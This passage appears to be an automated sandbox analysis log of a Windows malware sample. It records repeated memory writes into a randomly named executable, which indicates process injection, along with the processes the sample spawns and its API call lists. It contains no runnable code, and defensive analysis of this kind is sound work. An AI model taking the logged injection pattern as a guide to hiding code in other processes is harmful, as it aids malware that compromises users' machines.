            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 250000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2E0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 390000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1B0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 90000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 820000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 380000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3E0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 280000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 5F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 2B0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8A0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1D0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 180000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 1C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: C0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 8E0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 410000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 3A0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 160000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 130000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 140000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 190000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeMemory written: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe base: 100000Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Users\user\Desktop\25F.tmp.exe C:\Users\user\Desktop\25F.tmp.exeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Windows\notepad.exe "C:\Windows\notepad.exe" Jump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Users\user\Desktop\25F.tmp.exe C:\Users\user\Desktop\25F.tmp.exeJump to behavior
            Source: C:\Users\user\Desktop\25F.tmp.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
            Source: QgGhoOpxHPl.exe, 00000009.00000000.384034855.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 00000009.00000002.624311663.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 0000000A.00000002.624230565.0000000001260000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: QgGhoOpxHPl.exe, 00000009.00000000.384034855.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 00000009.00000002.624311663.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 0000000A.00000002.624230565.0000000001260000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: QgGhoOpxHPl.exe, 00000009.00000000.384034855.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 00000009.00000002.624311663.0000000001260000.00000002.00000001.00040000.00000000.sdmp, QgGhoOpxHPl.exe, 0000000A.00000002.624230565.0000000001260000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_006047B8
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,0_2_006048C3
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: GetLocaleInfoA,GetACP,0_2_00607C80
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: GetLocaleInfoA,0_2_00606ADC
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: GetLocaleInfoA,0_2_00606B28
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: GetLocaleInfoA,0_2_00604BC8
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,2_2_006048C3
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: GetLocaleInfoA,GetACP,2_2_00607C80
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: GetLocaleInfoA,2_2_00606ADC
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: GetLocaleInfoA,2_2_00606B28
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: GetLocaleInfoA,2_2_00604BC8
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,2_2_006047B8
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,4_2_0036B480
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,4_2_0040B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,9_2_003DB480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,10_2_0018B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,11_2_0038B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,12_2_0041B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,13_2_001BB480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,14_2_0035B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,15_2_0031B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,16_2_0038B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,17_2_0010B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,18_2_0010B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,19_2_0022B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,20_2_0032B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,21_2_0051B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,22_2_0019B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,23_2_0084B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,25_2_0040B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,26_2_0082B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,27_2_0009B480
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: memset,lstrcpyA,lstrcpyA,HeapAlloc,GetVersionExA,lstrcpyA,HeapAlloc,strstr,lstrlenA,lstrlenA,GetLocaleInfoA,lstrcmpA,GetLocaleInfoA,GetLocaleInfoA,lstrcpyA,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,HeapAlloc,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,_snprintf,lstrcpyA,_snprintf,_snprintf,??3@YAXPAX@Z,29_2_005DB480
